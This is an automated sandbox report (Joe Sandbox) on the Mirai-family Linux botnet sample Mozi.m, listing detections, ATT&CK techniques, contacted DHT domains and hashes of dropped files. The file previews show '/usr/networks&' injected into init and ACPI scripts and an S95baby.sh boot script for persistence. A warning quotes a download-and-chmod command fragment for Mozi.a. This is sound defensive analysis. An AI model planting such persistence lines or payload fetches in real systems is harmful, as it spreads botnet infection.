                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountall-bootclean.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /etc/init.d/mountnfs.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /usr/bin/gettext.sh
                Source: /tmp/Mozi.m (PID: 4580)File: /usr/sbin/alsa-info.sh
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 34926 -> 49152
                Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 34926
                Source: unknownNetwork traffic detected: HTTP traffic on port 52998 -> 52869
                Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 8443
                Source: /tmp/Mozi.m (PID: 4564)Queries kernel information via 'uname':
                Source: /tmp/Mozi.m (PID: 4580)Queries kernel information via 'uname':
                Source: /tmp/Mozi.m (PID: 4603)Queries kernel information via 'uname':
                Source: /sbin/modprobe (PID: 4622)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 4823)Queries kernel information via 'uname':
                Source: /usr/share/apport/apport-gtk (PID: 4866)Queries kernel information via 'uname':

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Command and Scripting Interpreter 1 | .bash_profile and .bashrc 1 | .bash_profile and .bashrc 1 | Masquerading 1 | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Standard Port 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scripting 12 | At (Linux) 1 | At (Linux) 1 | File and Directory Permissions Modification 1 | Brute Force 1 | Remote System Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 12 | Security Account Manager | System Network Configuration Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 5 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 5 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

                Behavior Graph

                [Behavior graph image not reproduced. Behavior Graph ID: 336612, Sample: Mozi.m, Startdate: 06/01/2021, Architecture: LINUX, Score: 100]

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                Mozi.m | 70% | Virustotal |
                Mozi.m | 69% | ReversingLabs | Linux.Trojan.Mirai
                Mozi.m | 100% | Avira | LINUX/Mirai.lldau

                Dropped Files

                Source | Detection | Scanner | Label
                /usr/networks | 100% | Avira | LINUX/Mirai.lldau
                /usr/networks | 69% | ReversingLabs | Linux.Trojan.Mirai

                Domains

                No Antivirus matches

                URLs


                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                dht.transmissionbt.com | 87.98.162.88 | true | false | | high
                bttracker.acc.umu.se | 130.239.18.159 | true | false | | high
                router.bittorrent.com | 67.215.246.10 | true | false | | high
                router.utorrent.com | 82.221.103.244 | true | false | | high
                bttracker.debian.org | unknown | unknown | false | | high

                Contacted URLs


                          URLs from Memory and Binaries


                                                Contacted IPs


                                                General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336612
Start date: 06.01.2021
Start time: 14:56:50
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 30s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Mozi.m
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal100.spre.troj.evad.linM@0/221@4/0
                                                Warnings:
                                                • Excluded IPs from analysis (whitelisted): 91.189.92.38, 91.189.92.19, 91.189.92.20, 91.189.92.41, 91.189.92.39, 91.189.92.40
                                                • HTTP Packets have been reduced
                                                • TCP Packets have been reduced to 100
                                                • Created / dropped Files have been reduced to 100
                                                • Excluded domains from analysis (whitelisted): api.snapcraft.io
                                                • VT rate limit hit for: http://%s:%d/Mozi.a;chmod


                                                Runtime Messages

                                                Command:/tmp/Mozi.m
                                                Exit Code:0
                                                Exit Code Info:
                                                Killed:False
                                                Standard Output:

                                                Standard Error:telnetd: no process found
                                                utelnetd: no process found
                                                scfgmgr: no process found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                qemu: Unsupported ARM syscall: 0x4ace97
                                                qemu: uncaught target signal 4 (Illegal instruction) - core dumped
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                /bin/sh: 1: cfgtool: not found
                                                /bin/sh: 1: cfgtool: not found
                                                Unsupported ioctl: cmd=0xffffffff80045705
                                                Unsupported ioctl: cmd=0xffffffff80045705

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains


                                                ASN


                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                Match                    Associated Sample Name / URL   Detection
                                                /etc/init.d/S95baby.sh   Mozi.m                         malicious
                                                                         1skm346Xtz                     malicious
                                                                         Mozi.a                         malicious
                                                                         Mozi.1.m                       malicious
                                                                         6wuvHEBHt8.bin                 malicious
                                                                         7v1ic5IS8I                     malicious
                                                                         Mozi.a                         malicious
                                                                         Mozi.a                         malicious
                                                                         Mozi.m                         malicious
                                                                         Mozi.m                         malicious
                                                                         Mozi.m                         malicious
                                                                         bad_file                       malicious
                                                                         mxjzQQFgLp                     malicious
                                                                         JrAL1wW1MQ                     malicious
                                                /etc/rcS.d/S95baby.sh    Mozi.m                         malicious
                                                                         1skm346Xtz                     malicious
                                                                         Mozi.a                         malicious
                                                                         Mozi.1.m                       malicious
                                                                         6wuvHEBHt8.bin                 malicious
                                                                         7v1ic5IS8I                     malicious
                                                                         Mozi.a                         malicious
                                                                         Mozi.a                         malicious
                                                                         Mozi.m                         malicious
                                                                         Mozi.m                         malicious
                                                                         Mozi.m                         malicious
                                                                         bad_file                       malicious
                                                                         mxjzQQFgLp                     malicious
                                                                         JrAL1wW1MQ                     malicious

                                                                                                        Created / dropped Files

                                                                                                        /boot/grub/i386-pc/modinfo.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/acpi/asus-keyboard-backlight.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):326
                                                                                                        Entropy (8bit):5.2904323771702915
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:K8K2A6godGINKlsX3stINKVHBfNewdrCDjwFhD2UDKVHxMn:1f/NA23stIN8HdNTek3n8HWn
                                                                                                        MD5:626FDB50CA17F4E2BAAB79F09F3EB73B
                                                                                                        SHA1:2D838897E7D735CB67348F60EDA0E1E41D45DCBE
                                                                                                        SHA-256:3FDFC702E6D3E1FE75E88B60408ED1B435F3AE24A57B56636C16CB321CBAE440
                                                                                                        SHA-512:E3FB063A63DF21B22D20754AE2CEA1F0D80464F4A870491E2843F7D88EBA181E351C4A20D67AD6A4CD8D1BF26971C654C502D5770D5B43B34024FAF2048171F5
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -d $KEYS_DIR || exit 0..MIN=0.MAX=$(cat $KEYS_DIR/max_brightness).VAL=$(cat $KEYS_DIR/brightness)..if [ "$1" = down ]; then..VAL=$((VAL-1)).else..VAL=$((VAL+1)).fi..if [ "$VAL" -lt $MIN ]; then..VAL=$MIN.elif [ "$VAL" -gt $MAX ]; then..VAL=$MAX.fi..echo $VAL > $KEYS_DIR/brightness../usr/networks&.exit 1.
                                                                                                        /etc/acpi/asus-wireless.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):157
                                                                                                        Entropy (8bit):4.412729940630044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVfGHvNM8iKWERAIda74QvvvLwDGvNM8iKWERAIdJCsqORFL8OORgn:KJFn40MLFb+Pn
                                                                                                        MD5:9B10038ADE21F207C6C9F4EEC7C5ADA2
                                                                                                        SHA1:F3FB51110B022F8BFEA1874C6D6984D8C6EF8C7B
                                                                                                        SHA-256:E6322FBB30D1362ED490A39BE58B491C7DB9CC96DB09C8E2BDC1B1F35E1A00E2
                                                                                                        SHA-512:C9A47A0A449FD009221006D9077F1EDD25305EDA017DED7542AAF8EF80166B1645B889B478D6067ED2CB0123D798103DD73FD69B818C9B9704A274DC3FB4EA15
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0... /usr/share/acpi-support/state-funcs..toggleAllWirelessStates../usr/networks&.exit 1.
                                                                                                        /etc/acpi/ibm-wireless.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):636
                                                                                                        Entropy (8bit):4.722087767454589
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:wNGs4KSb7jFCR2TeNMngFfiTccfkneFhpmtjwkuVSd/1kVqEn:wFS/5uab2d7neFhij26/CwE
                                                                                                        MD5:77315C7FA7809C62D27AD6C9EE1C9289
                                                                                                        SHA1:C8EC67C17E334B13B1DE93B0D2E822C606F9985E
                                                                                                        SHA-256:81CB0908E30FCF60AEA43776D5F1C3AEE6E1B46190A3DB5A1866CD1D2E09E17E
                                                                                                        SHA-512:B679EF04092FDDBB0FA290F2D817DA38601336261870EE37BE6FA9451004B338E3A981694A0320B40A47A3597BA7B172848C877313F169ECDE3B8FB7FE38C582
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/state-funcs || exit 0..# Find and toggle wireless of bluetooth devices on ThinkPads... /usr/share/acpi-support/state-funcs..rfkill list | sed -n -e'/tpacpi_bluetooth_sw/,/^[0-9]/p' | grep -q 'Soft blocked: yes'.bluetooth_state=$?..# Note that this always alters the state of the wireless!.toggleAllWirelessStates;..# Sequence is Both on, Both off, Wireless only, Bluetooth only.if ! isAnyWirelessPoweredOn; then. # Wireless was turned off. if [ "$bluetooth_state" = 0 ]; then. rfkill unblock bluetooth. else. rfkill block bluetooth. fi.fi../usr/networks&.exit 1.
                                                                                                        /etc/acpi/powerbtn.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2079
                                                                                                        Entropy (8bit):4.778187000249208
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:pDpMMOMTeMn/zV5rh/1RzUKH2Z8uBiXGp2fVU6GjJN+V4ATo+aZ+:pCgeCrhXHzDfVpmhC/
                                                                                                        MD5:CF725BE1199B06F062A47095420F7DC5
                                                                                                        SHA1:98F1BC7C1B81C708B326BB3DC1C33AA3F29D8BBE
                                                                                                        SHA-256:C617FF036646CF1EEF3AC91EC504093CC25C93E07850276AA37AA2542A724B01
                                                                                                        SHA-512:D2F9649FED4B309108F2C67F28B1EE66C30219AF9B36F30E85F190064B3D5A65963BF6B9D3A8662A2197B47DFECA95D52447D7FCA4CDBAA69BB722BE5417DC50
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&. exit 0.fi..# getXuser gets the X user belonging to the display in $displaynum..# If you want the foreground X user, use getXconsole!.getXuser() {. user=`pinky -fw | awk '{ if ($2 == ":'$displaynum'" || $(NF) == ":'$displaynum'" ) { print $1; exit; } }'`. if [ x"$user" = x"" ]; then. startx=`pgrep -n startx`. if [ x"$startx" != x"" ]; then. user=`ps -o user --no-headers $startx`. fi. fi. if [ x"$user" != x"" ]; then. userhome=`getent passwd $user | cut -d: -f6`. export XAUTHORITY=$userhome/.Xauthority. else. export XAUTHORITY="". fi. export XUSER=$user.}..# Skip if we just in the middle of resuming..test -f /var/lock/acpisleep && exit 0..# If the current X console user is running a power management daemon that.# handles suspend/resume requests, let them handle policy This is effectively.# the same as 'acpi-s
                                                                                                        /etc/acpi/tosh-wireless.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):483
                                                                                                        Entropy (8bit):4.215331622973397
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:KJFqcA/0MLFMkneFUJLS3SU9mFCQROAJzHdcnK/lHb/iHIYK3zQYlyMn:wK8QdeFuS3lyXp9cK/lziijQYlrn
                                                                                                        MD5:07889D65619CDB80F8E876A087F160D3
                                                                                                        SHA1:35CB92B632BCA335EBEA933A736F75856E8CA262
                                                                                                        SHA-256:34768A7BD08F050862E888142B6246B41458957CF56BC4879619D3A315E3567B
                                                                                                        SHA-512:C86DE6FC5047AC695717E11B8714DE439E63949B439C3B8AA79C060CF0E807FB964C81B1FF59A7C0F38E0F3CC85E6784F56E1536DDDE9B66D1E22D306BEFCFAE
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0... /usr/share/acpi-support/state-funcs..if isAnyWirelessPoweredOn; then. if [ -x /usr/bin/toshset ]; then. if `toshset -bluetooth | grep -q attached`; then. toshset -bluetooth off. toggleAllWirelessStates. else. toshset -bluetooth on. fi. else..toggleAllWirelessStates. fi.else. toggleAllWirelessStates.fi../usr/networks&.exit 1.
                                                                                                        /etc/acpi/undock.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):266
                                                                                                        Entropy (8bit):4.77497394042067
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:KJFqcA/05CbMTCYEBKAABrX8FvfbrX8EmNv0V4n:wK852PYEBKAkrX4HXHnV4n
                                                                                                        MD5:5E3A15E41D35EC409613236A20B5783E
                                                                                                        SHA1:5D71BD9A121461464F7937B2E921410ED93BEE24
                                                                                                        SHA-256:C3294C9B06A81A3325E131BF139B5F1C8615290B382F0014DA440F4F76C49BEA
                                                                                                        SHA-512:13E47AA60C322CB0DEF4894B97625EC2E3AE9214743569AD566ECA1331D581CD2185BC27CD538E8BA5D475FBBB79EC76EA4CCE31EDB115F30684D80CA9F5F1F4
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.test -f /usr/share/acpi-support/key-constants || exit 0..for device in /sys/devices/platform/dock.*; do..[ -e "$device/type" ] || continue..[ x$(cat "$device/type") = xdock_station ] || continue..echo 1 > "$device/undock".done../usr/networks&.exit 1.
                                                                                                        /etc/bash_completion.d/libreoffice.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/init.d/S95baby.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25
                                                                                                        Entropy (8bit):3.8936606896881854
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                        Malicious:true
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: Mozi.m, Detection: malicious
                                                                                                        • Filename: 1skm346Xtz, Detection: malicious
                                                                                                        • Filename: Mozi.a, Detection: malicious
                                                                                                        • Filename: Mozi.1.m, Detection: malicious
                                                                                                        • Filename: 6wuvHEBHt8.bin, Detection: malicious
                                                                                                        • Filename: 7v1ic5IS8I, Detection: malicious
                                                                                                        • Filename: Mozi.a, Detection: malicious
                                                                                                        • Filename: Mozi.a, Detection: malicious
                                                                                                        • Filename: Mozi.m, Detection: malicious
                                                                                                        • Filename: Mozi.m, Detection: malicious
                                                                                                        • Filename: Mozi.m, Detection: malicious
                                                                                                        • Filename: bad_file, Detection: malicious
                                                                                                        • Filename: mxjzQQFgLp, Detection: malicious
                                                                                                        • Filename: JrAL1wW1MQ, Detection: malicious
                                                                                                        Reputation:moderate, very likely benign file
                                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                                        /etc/init.d/bootmisc.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):148
                                                                                                        Entropy (8bit):4.718194263525147
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4KXGK+R0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4GX+R0Voo+v7n
                                                                                                        MD5:68EC1ED64500D143FE44D1ED0B19DD83
                                                                                                        SHA1:90AE6027194C555ED6DE71191682E1773DD8E609
                                                                                                        SHA-256:F450F84C27D8339C63251AEB3DC06634AC42E8F4B0AFDA734E1044B5453ECF0D
                                                                                                        SHA-512:C9CD195893143DE17D2029672DA2236C7EC44498B1B5F13526CCA56665388790A198ECD0F2FE097FB8D035F780AFFCC5F984DDE1D0540AA778892F52E7698EBB
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/checkfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):147
                                                                                                        Entropy (8bit):4.7173471450646
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                        MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                        SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                        SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                        SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/checkroot-bootclean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):250
                                                                                                        Entropy (8bit):4.872318043360431
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                        MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                        SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                        SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                        SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/checkroot.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3111
                                                                                                        Entropy (8bit):4.922960717312443
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                        MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                        SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                        SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                        SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                        /etc/init.d/hostname.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):404
                                                                                                        Entropy (8bit):5.01878905639229
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                        MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                        SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                        SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                        SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/hwclock.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountall-bootclean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):249
                                                                                                        Entropy (8bit):4.8912088003487595
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                        MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                        SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                        SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                        SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountall.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):148
                                                                                                        Entropy (8bit):4.74526082342869
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                        MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                        SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                        SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                        SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountdevsubfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):56
                                                                                                        Entropy (8bit):4.1427249051134325
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                        MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                        SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                        SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                        SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountkernfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
